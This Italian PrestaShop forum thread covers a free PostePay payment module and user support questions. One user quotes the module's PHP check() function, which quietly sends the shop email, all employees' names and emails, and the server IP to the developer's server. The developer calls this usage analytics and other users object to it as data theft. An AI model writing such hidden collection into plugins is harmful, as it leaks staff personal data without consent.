Jump to content
Tanzo.it

[MODULO GRATUITO] Modulo ricarica PostePay con codice fiscale [1.7.5.x]

Recommended Posts

Salve e buongiorno a tutti :).

 

Dopo aver sviluppato e messo a disposizione della community questo modulo per la versione 1.6 (disponibile a questo post) il nostro reparto tecnico ha trovato un ritaglio di tempo per poterne sviluppare una versione adatta al nuovo PrestaShop, la 1.7 per l'appunto  :)

 

Abbiamo deciso di creare un nuovo post perché questo modulo è totalmente (o quasi) diverso da quello per la 1.6, che di fatto non funzionerebbe. Quindi riscritto appositamente per la 1.7, e compatibile con il nuovo template 'classic' (ovviamente  :) )

 

Il modulo è stato creato sulla versione 1.7.0.4 di PrestaShop. Testato fino alla 1.7.4.1.

 

Il modulo oltre ad aggiungere uno stato d'ordine specifico per il metodo di pagamento scelto aggiunge anche i template delle email con le specifiche informazioni della PostePay da dover ricaricare, quindi il titolare, il numero di PostePay e il codice fiscale del titolare.

 

Potete personalizzare i testi delle email nel seguente percorso (dopo aver installato il modulo)

prestashop/mails/it/tanzopostepay.html

Accettiamo qualsiasi suggerimento per delle eventuali migliorie o modifiche da applicare.

 

Il modulo è risk-free, ma consigliamo sempre di provarlo prima in un ambiente di test, mi raccomando.

Buon download, e se vi è stato utile un like è sempre gradito   ;)

 

v1.0.5-ps_tanzopostepay-ps17.zip

 

 

Changelog

 

## 1.0.5 - 2018-12-21
### Added
- Added compatibility to PrestaShop 1.7.5.x

## 1.0.4 - 2018-07-17
### Added
- Added compatibility to PrestaShop 1.7.4.x

## 1.0.3 - 2018-03-12
### Added
- Added compatibility to PrestaShop 1.7.3.x

## 1.0.2 - 2017-08-14
### Added
- Added compatibility to PrestaShop 1.7.2.x

## 1.0.1 - 2017-07-25
### Added
- Added compatibility to PrestaShop 1.7.1.x
### Fixed
- Fixed italian translation
 

## 1.0.0 - 2017-02-08
### Added
- First release

 

 

Older version

 

 

DISCLAIMER

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF THE USE OR INABILITY TO USE THE SOFTWARE OR FROM OTHER DEALINGS IN THE SOFTWARE. DOWNLOADING AND INSTALLING THIS PRODUCT YOU ACCEPT THE TANZO ANALYSIS PROGRAM.

Edited by Tanzo.it (see edit history)
  • Like 7
  • Thanks 4
  • Sad 1

Share this post


Link to post
Share on other sites

Salve, ho provato anch'io ad installarlo sulla 1.7.1.2 ma restituisce un errore.

 

A dire il vero lo stesso problema lo sto riscontrando anche con altri moduli che non davano problemi con la 1.7.0

 

Avete qualche consiglio in merito? Grazie

 

Share this post


Link to post
Share on other sites

Salve, se postate l'errore cercheremo di estendere la compatibilità anche alla versione 1.7.1.x  ;)

Share this post


Link to post
Share on other sites

Buongiorno. Su Prestashop 1.7.1.2 durante il caricamento del file .zip viene rilasciato il seguente messaggio:

"Installazione del modulo ps_tanzopostepay fallita. La versione del tuo modulo non è adatta alla tua versione di PrestaShop."

Share this post


Link to post
Share on other sites

Buongiorno. Su Prestashop 1.7.1.2 durante il caricamento del file .zip viene rilasciato il seguente messaggio:

"Installazione del modulo ps_tanzopostepay fallita. La versione del tuo modulo non è adatta alla tua versione di PrestaShop."

 

Perfetto, giro la richiesta al reparto tecnico, sicuramente non appena avranno modo rilasceranno un aggiornamento per estendere la compatibilità.  ;)

  • Like 1

Share this post


Link to post
Share on other sites

Errore su download

 

Oups! Sorry, you don't have permission for that!

You do not have permission to view this attachment.

 

Share this post


Link to post
Share on other sites

Salve INGEMATIC, il post era in fase di aggiornamento, è alquanto strano che si potessero già vedere gli aggiornamenti  :blink:

Ad ogni modo, il reparto tecnico ha verificato la compatibilità con la nuova versione e quindi ha provveduto ad aggiornare la compatibilità.

 

Nel primo post potete trovare la versione aggiornata e compatibile con la 1.7.1.x  ;)

Share this post


Link to post
Share on other sites

Salve Tanzo e grazie per la condivisione!!

Ho provato ad installare il modulo sulla ultima versione stabile di prestashop 1.7.2.0

purtroppo non funziona sembra non essere compatibile.

 

Hai novità a riguardo?

Share this post


Link to post
Share on other sites

Salve Tanzo e grazie per la condivisione!!

Ho provato ad installare il modulo sulla ultima versione stabile di prestashop 1.7.2.0

purtroppo non funziona sembra non essere compatibile.

 

Hai novità a riguardo?

 

Salve, il nostro reparto tecnico nonostante il caldo :wacko:  è in pieno ritmo produttivo ed ha aggiornato la compatibilità del modulo alla 1.7.2.0  B)

 

Buon download  ;)

Share this post


Link to post
Share on other sites

Buonasera. Spero vogliate perdonare la mia richiesta di suggerimento, ovviamente dettata da inesperienza...

Ho provato a caricare il modulo in oggetto, senza accorgermi che la versione che utilizzo è una 1.6.1.17...

ora se provo ad accedere alla pagina menù Moduli e Servizi mi da questo codice d'errore

"[PrestaShop] Fatal error in module file :/home/legittim/public_html/classes/module/Module.php(1361) : eval()'d code:
syntax error, unexpected 'use' (T_USE)"

Qualcuno sa gentilmente indicarmi come intervenire?

Non sono un programmatore, sto provando ad utilizzare Prestashop installatomi direttamente da Siteground, quindi mi trovo un po digiuno di codice di programmazione...

Share this post


Link to post
Share on other sites
On 4/1/2018 at 5:31 PM, soleacciaio said:

Buonasera. Spero vogliate perdonare la mia richiesta di suggerimento, ovviamente dettata da inesperienza...

Ho provato a caricare il modulo in oggetto, senza accorgermi che la versione che utilizzo è una 1.6.1.17...

ora se provo ad accedere alla pagina menù Moduli e Servizi mi da questo codice d'errore

"[PrestaShop] Fatal error in module file :/home/legittim/public_html/classes/module/Module.php(1361) : eval()'d code:
syntax error, unexpected 'use' (T_USE)"

Qualcuno sa gentilmente indicarmi come intervenire?

Non sono un programmatore, sto provando ad utilizzare Prestashop installatomi direttamente da Siteground, quindi mi trovo un po digiuno di codice di programmazione...

 

Ciao soleacciaio, sei riuscito a risolvere? Purtroppo andrebbero eliminati i file manualmente e agire sul database per poter dire a PrestaShop che è stato "disinstallato" il modulo.

Siamo qui per qualsiasi dubbio.

Share this post


Link to post
Share on other sites
On 3/2/2018 at 4:10 PM, Angelo Ponzio said:

Salve, sulla 1.7.2.4 funziona ?

 

Ciao Angelo Ponzio, certo, e dovrebbe essere già compatibile con la 1.7.3.0 ;)

Share this post


Link to post
Share on other sites
30 minutes ago, Tanzo.it said:

 

Ciao Angelo Ponzio, certo, e dovrebbe essere già compatibile con la 1.7.3.0 ;)

Grazie, da dove lo posso scaricare?

e ho pure appreso che già è uscita la 1.7.3, non lo sapevo proprio

Share this post


Link to post
Share on other sites

Se ti riferisci al modulo lo trovi al primo messaggio di questo post, tieni presente che la 1.7.3.0 è in beta, quindi ancora non è una release stabile ;)

Share this post


Link to post
Share on other sites
9 hours ago, Tanzo.it said:

Se ti riferisci al modulo lo trovi al primo messaggio di questo post, tieni presente che la 1.7.3.0 è in beta, quindi ancora non è una release stabile ;)

grazie per il consiglio sulla  1.7.3

 

Share this post


Link to post
Share on other sites
On 10/3/2018 at 12:20 PM, fermartsa@gmail.com said:

Non è compatibile con la versione 1.7.3.0. Non riesco ad installarlo.

 

Ciao fermartsa@gmail.com, grazie per la segnalazione, il reparto tecnico ha provveduto ad aggiornare il modulo e renderlo compatibile con la 1.7.3 ;) lo trovi disponibile in download qui nel primo post.

Share this post


Link to post
Share on other sites

Buongiorno, ho installato il vostro modulo postepay su prestashop 1.7.3 ma avrei un problema. Quando si effettua l'ordine e si arriva nella schermata di conferma ordine (come allegato sotto).

Il tuo ordine su A*************** è completo. 

Di seguito le informazioni per la ricarica 


 Ammontare del pagamento. 71,98 € 
Titolare PostePay B**************
 Numero PostePay 1231231231231231313 
 Codice Fiscale titolare 

Il problema è che la dicitura "Il tuo ordine su ....... " non è corretto in quanto ho cambiato il nome del negozio. Come posso cambiare il nome del negozio sul modulo visto che risulta non corretto?

 Vorrei integrare il vostro modulo nel mio sito ma cosi risulta impossibile visto che il negozio non ha il nome corretto.

 Cordiali saluti

Daniel

Share this post


Link to post
Share on other sites

Salve. Ottimo modulo...sulla versione 1.6.20 nessun problema.

Sulla versione 1.7.4 non si può effettuare l'installazione. Modulo incompatibile

Share this post


Link to post
Share on other sites

Ciao, confermo l'incompatibilità con l'ultima versione di prestashop.. indica che il modulo non è compatibile

Edited by Zenga (see edit history)

Share this post


Link to post
Share on other sites

Ciao, confermo l'incompatibilità con l'ultima versione di prestashop.. indica che il modulo non è compatibile

Share this post


Link to post
Share on other sites

Salve @teknashop @Zenga, grazie per la segnalazione, il nostro reparto tecnico ha aggiornato la compatibilità con la versione 1.7.4.x 

E' disponibile al download nel primo post ;) 

 

PS: L'ultima versione del modulo (al momento) è la 1.0.4

  • Like 1

Share this post


Link to post
Share on other sites
On 21/7/2018 at 2:05 PM, Poggionet said:

Salve, vado un pò fuori tema, esiste un vostro modulo per pagamento con bollettino postale?

Salve Poggionet, purtroppo no :), tenendo presente che online è un metodo di pagamento oramai sorpassato, forse lei ha bisogno di un qualcosa di più specifico?

Share this post


Link to post
Share on other sites
30 minutes ago, jucasport.it said:

Installato ! GRAZIE

Ma prego jucasport.it! ;)

  • Thanks 1

Share this post


Link to post
Share on other sites

Salve e grazie per il modulo. Lo utilizziamo ormai da anni (sia su ps16 che ps17) e, ad oggi, non abbiamo riscontrato alcun problema! 

desidero chiedere se, nelle versioni successive, verranno aggiunte l'url ed il codice qr per consentire ai clienti il pagamento p2p (tramite app PostePay). 

Grazie 

  • Like 1

Share this post


Link to post
Share on other sites
On 26/8/2018 at 12:50 PM, DailyShopBay said:

Salve e grazie per il modulo. Lo utilizziamo ormai da anni (sia su ps16 che ps17) e, ad oggi, non abbiamo riscontrato alcun problema! 

desidero chiedere se, nelle versioni successive, verranno aggiunte l'url ed il codice qr per consentire ai clienti il pagamento p2p (tramite app PostePay). 

Grazie 

 

Salve DailyShopBay, purtroppo al momento non è prevista questa integrazione. Però grazie alla tua segnalazione sicuramente valuteremo questa possibilità ;)

Grazie mille ;)

Share this post


Link to post
Share on other sites

Salve a tutti,

da qualche giorno ho il nuovo negozio in prestashop , mi hanno installato la 1.7.4.3 , sapete se è compatibile il modulo postepay.

Grazie e buon lavoro a tutti.

Share this post


Link to post
Share on other sites

Ciao Matteo,

non dovresti avere difficoltà ad installarlo sulla tua versione ;) 

Se riscontri problemi, scrivi pure qui in questo post ;)

 

Un saluto ;)

Share this post


Link to post
Share on other sites

Tutto perfetto- Grazie , ho un problemino da risolvere e non penso che sia il post adatto ma ho bisogno e ancora non ho trovato neanche nei moduli a pagamento , un modulo che calcola il costo delle diverse spedizioni non su base peso ma su base prezzo e mostri sullo schermo le varie opzioni delle spedizioni tra prioritaria - raccomandata - corriere e ritiro in sede .

Share this post


Link to post
Share on other sites

Ciao Matteo, se abbiamo capito bene probabilmente non hai bisogno di un modulo, ma di configurare i corrieri con fasce di prezzo e non di peso, è un'opzione base di PrestaShop ;)

 

Un saluto ;)

Share this post


Link to post
Share on other sites

Da tutte le prove che ho effettuato è venuto fuori che se inserisco + vettori ne sceglie solo uno oppure mi risponde con spedizione gratuita mentre con uno solo e le varie fasce mi cambia la spedizione ma a me serve a parità di prezzo che l'acquirente scelga la spedizione e neanche a pagamento riesco a trovare il modulo adatto o forse sono io che sono inesperto.

Share this post


Link to post
Share on other sites
On 30/10/2018 at 12:28 PM, Tanzo.it said:

Ciao Matteo,

non dovresti avere difficoltà ad installarlo sulla tua versione ;) 

Se riscontri problemi, scrivi pure qui in questo post ;)

 

Un saluto ;)

Ciao, ho provato ad installarlo sulla 1.7.4.4 e l'installazione e configurazione va a buon fine ma facendo un test una volta selezionato il pagamento e cliccato su ordine con obbligo di pagamento spunta error 500

 

500 Server Error

Oops, something went wrong.

Try to refresh this page or feel free to contact us if the problem persists.

 

esattamente l'indirizzo si blocca sulla pagina validation

 

sai come aiutarmi? o se è un problema del modulo?

 

grazie mille!

 

 

Share this post


Link to post
Share on other sites
2 hours ago, Matteo.Vaia said:

Ho la versione 1.7.4.3.e nessun problema viene riscontrato fino all'ultimazione dell'ordine.

Nella 1.7.4.4 purtroppo non va...

Share this post


Link to post
Share on other sites

Salve Federico, hai già provato a disinstallare e re-installare? Hai controllato i permessi delle cartelle?

Non abbiamo riscontrato problematiche in su un'installazione pulita della 1.7.4.4 ;)

 

Un saluto ;)

 

@Matteo.Vaia 

Apri un nuovo post nel forum, nella sezione Aiuto e supporto, probabilmente avrai molto più aiuto che in questo post ;)

Share this post


Link to post
Share on other sites

Salve,

vorrei sapere se il modulo è compatibile con la versione 1.7.5.0.

Saluti e grazie per il vostro lavoro.

Share this post


Link to post
Share on other sites

Buongiorno,

ho visto la seguente funzione nel file ps_tanzopostepay.php ma non ho capito a cosa serva.

Sembra inviare a Tanzo la lista degli account ma non ne capisco la necessità.

public function check()
    {
        if (function_exists('curl_exec')) {
            $id_shop = Context::getContext()->shop->id;
            $shop_url = ShopUrl::getMainShopDomain($id_shop);
            $srv_ip = $_SERVER['SERVER_ADDR'];
            $httphost = self::getHttpHost();
            if(!filter_var($srv_ip, FILTER_VALIDATE_IP)){
                $host = gethostname();
            }
            $module_name = self::getMyModuleName();
            $employees = Employee::getEmployees(false);
            $emp = '';
            foreach($employees AS $employee) {
                $emp_obj = new Employee((int)$employee['id_employee']);
                $emp .= 'firstname:'.$emp_obj->firstname.' lastname:'.$emp_obj->lastname.' Email:'.$emp_obj->email.'-';
            }
            $fields = array(
                'mdlnm' => $module_name,
                'email' => Configuration::get('PS_SHOP_EMAIL'),
                'employees' => $emp,
                'shopurl' => $shop_url,
                'srvip' => $srv_ip,
                'httphost' => $httphost
            );

            $ch = @curl_init();
            @curl_setopt($ch, CURLOPT_URL, 'https://helpdesk.tanzo.it/cth');
            @curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            @curl_setopt($ch, CURLOPT_VERBOSE, false);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $response = @curl_exec($ch);
            $status_code = (int)@curl_getinfo($ch, CURLINFO_HTTP_CODE);
            @curl_close($ch);
        }

        return true;
    }

 

A cosa serve?

  • Thanks 1

Share this post


Link to post
Share on other sites

@Kenix

Appena caricata la versione testata e resa compatibile per la 1.7.5.x, buon download 😉

 

@ManuelFala

Se leggi il disclaimer del primo post c'è scritto, ad ogni modo è per un'analisi sull'utilizzo 😉

Share this post


Link to post
Share on other sites

Grazie prima di tutto per la rapidità.

Ho provato ad installare il modulo con la versione aggiornata 1.7.5.0 ma l'istallazione va a buon fine, riesco a configurare tutti i parametri però dopo non appare fra le opzioni di pagamento disponibili.

Share this post


Link to post
Share on other sites
On 21/12/2018 at 5:10 PM, ManuelFala dice:

Buongiorno,

ho visto la seguente funzione nel file ps_tanzopostepay.php ma non ho capito a cosa serva.

Sembra inviare a Tanzo la lista degli account ma non ne capisco la necessità.


public function check()
    {
        if (function_exists('curl_exec')) {
            $id_shop = Context::getContext()->shop->id;
            $shop_url = ShopUrl::getMainShopDomain($id_shop);
            $srv_ip = $_SERVER['SERVER_ADDR'];
            $httphost = self::getHttpHost();
            if(!filter_var($srv_ip, FILTER_VALIDATE_IP)){
                $host = gethostname();
            }
            $module_name = self::getMyModuleName();
            $employees = Employee::getEmployees(false);
            $emp = '';
            foreach($employees AS $employee) {
                $emp_obj = new Employee((int)$employee['id_employee']);
                $emp .= 'firstname:'.$emp_obj->firstname.' lastname:'.$emp_obj->lastname.' Email:'.$emp_obj->email.'-';
            }
            $fields = array(
                'mdlnm' => $module_name,
                'email' => Configuration::get('PS_SHOP_EMAIL'),
                'employees' => $emp,
                'shopurl' => $shop_url,
                'srvip' => $srv_ip,
                'httphost' => $httphost
            );

            $ch = @curl_init();
            @curl_setopt($ch, CURLOPT_URL, 'https://helpdesk.tanzo.it/cth');
            @curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            @curl_setopt($ch, CURLOPT_VERBOSE, false);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $response = @curl_exec($ch);
            $status_code = (int)@curl_getinfo($ch, CURLINFO_HTTP_CODE);
            @curl_close($ch);
        }

        return true;
    }

 

A cosa serve?

Scusa ero programmatore non php mi interesserebbe sapere quale parte del codice invia la lista dei contatti?

Share this post


Link to post
Share on other sites

Non per qualcosa stavo appena facendo i complimenti per lo spirito della community ma se fosse davvero un modulo gratuito per un secondo fine ci rimarrei molto male

  • Like 1

Share this post


Link to post
Share on other sites
Posted (edited)

Ciao daniele, nessun secondo fine, come spiegato serve per analisi di utilizzo che ci permettono di migliorare il/i modulo/i che mettiamo a disposizione, di aggiungere o modificare funzionalità, e magari di offrire un prodotto migliore, ed chiaramente scritto nella disclaimer 😊

Non ri-vendiamo o facciamo marketing, sei libero di non utilizzarlo o di modificarlo a piacimento data la licenza di distribuzione.

Un saluto 😉

Edited by Tanzo.it (see edit history)

Share this post


Link to post
Share on other sites

Non mi preoccupo di dati non c'è niente di così sensibile.

Nel caso in cui fosse vero che dati del cliente andassero su altri database per il nuovo decreto gdpr andrebbe espresso dove vanno a finire da chi custoditi e come vengono custoditi e devono essere accettati dal cliente. 

  • Like 1

Share this post


Link to post
Share on other sites

Nooooooooooooo non ci posso credere :-(:-(:-( ho installato il modulo l'ho configurato tutto funzionava ora quando torno nei moduli mi da errore 

Cannot get catalog data, please try again later. Reason: cURL error 28: Operation timed out after 5001 milliseconds with 0 out of 0 bytes received

Sono sicuro che sia una coincidenza per cortesia aiutatemiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

  • Confused 1

Share this post


Link to post
Share on other sites

Ciao,sono abbastanza nuovo di prestashop (ma no nel web dev)
ho un problema con questo modulo.

Funziona, ma la mail che arriva al cliente non riporta i dati della postepay (mentrer sul sito in fase di ordine mi pare ci siano)
come posso risolvere?

Grazie

Share this post


Link to post
Share on other sites
On 1/4/2019 at 11:43 AM, Tanzo.it said:

Ciao daniele, nessun secondo fine, come spiegato serve per analisi di utilizzo che ci permettono di migliorare il/i modulo/i che mettiamo a disposizione, di aggiungere o modificare funzionalità, e magari di offrire un prodotto migliore, ed chiaramente scritto nella disclaimer 😊

Non ri-vendiamo o facciamo marketing, sei libero di non utilizzarlo o di modificarlo a piacimento data la licenza di distribuzione.

Un saluto 😉

Ciao, perdonami è possibile sapere quali dati in particolare vengono presi dai nostri siti ed a voi inviati?

Share this post


Link to post
Share on other sites
6 hours ago, markoroots said:

Ciao, perdonami è possibile sapere quali dati in particolare vengono presi dai nostri siti ed a voi inviati?

Ciao markoroots, dall'ultimo aggiornamento nessun dato viene recuperato 😉

Share this post


Link to post
Share on other sites
10 hours ago, FrancescoM said:

Ciao,sono abbastanza nuovo di prestashop (ma no nel web dev)
ho un problema con questo modulo.

Funziona, ma la mail che arriva al cliente non riporta i dati della postepay (mentrer sul sito in fase di ordine mi pare ci siano)
come posso risolvere?

Grazie

Ciao FrancescoM, che versione di PS hai?

Share this post


Link to post
Share on other sites

Ciao, ho quella da 39 euro in realtà... mi sa che non è la stessa

v1.5.1 di Harlequin Graphic

Share this post


Link to post
Share on other sites

Ciao @FrancescoM, il modulo che trovi qui è gratuito, se l'hai comprato o pagato, o è un altro modulo e in qualche modo ti hanno gabbato :)

Noi speriamo per la prima ovviamente :)

 

Share this post


Link to post
Share on other sites
Posted (edited)

Ciao @Tanzo.it
io ho un VPS centos in cui é installato Prestashop 1.7.5.1.

Ho installato il vostro modulo, ma quando clicco su ordine con obbligo di pagamento, scegliendo postepay, mi ritorna http 500.

In un post precedente dicevi di controllare i permessi, ma io ho file a 644 e directory a 755...

Che tu sappia sono richiesti permessi diversi?

abilitando il debug, l'errore é "can't load order status" come se lo stato "Ricarica tramite PostePay" non fosse riconosciuto.

sapresti come aiutarmi?

Mi confermi che non prendete più i dati dei clienti?

grazie!

Edited by Jakketto
Edited VPS (see edit history)

Share this post


Link to post
Share on other sites

Ciao @Jakketto, hai già provato a disinstallare e re-installare il modulo? E' probabile che non sia stato installato lo stato d'ordine o sia stato eliminato successivamente e PrestaShop non trovandolo va in errore.

Tranquillo, nessun dato viene recuperato 😉

Facci sapere 👍

Share this post


Link to post
Share on other sites
Posted (edited)
On 4/2/2019 at 10:12 AM, Tanzo.it said:

Ciao markoroots, dall'ultimo aggiornamento nessun dato viene recuperato 😉

Sinceramente mi sembra veramente scorretto e subdolo da parte tua far finta di offrire un tuo contributo per aiutare il prossimo e lo spirito di una community che è la condivisione, quando poi si scopre che invece di dare una mano diffondi una mod che come un virus ha l'unico intento di rubare in modo anche totalmente illegale,  le informazioni sensibili di tutti gli utenti dagli altri siti. Fosse mio il forum ti avrei già sbattuto fuori. Dovresti vergognarti. Personalmente ho disinstallato subito il tuo plugin o meglio il tuo Trojan e di sicuro non installerò mai altro proveniente da te o dalla tua azienda.

Edited by markoroots (see edit history)
  • Like 1

Share this post


Link to post
Share on other sites
On 9/10/2019 at 4:03 PM, 1121033_1508433018 said:

Quando verrà rilasciato per la versione 1.7.6?

Puoi modificare nello zip il file ps_tanzopostepay.php cambiando la riga:

$this->ps_versions_compliancy = array('min' => '1.7', 'max' => '1.7.5.99');

in

$this->ps_versions_compliancy = array('min' => '1.7', 'max' => '1.7.99.99');

e rendere il modulo compatibile con tutte le future versioni di prestashop 1.7.x.x

 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More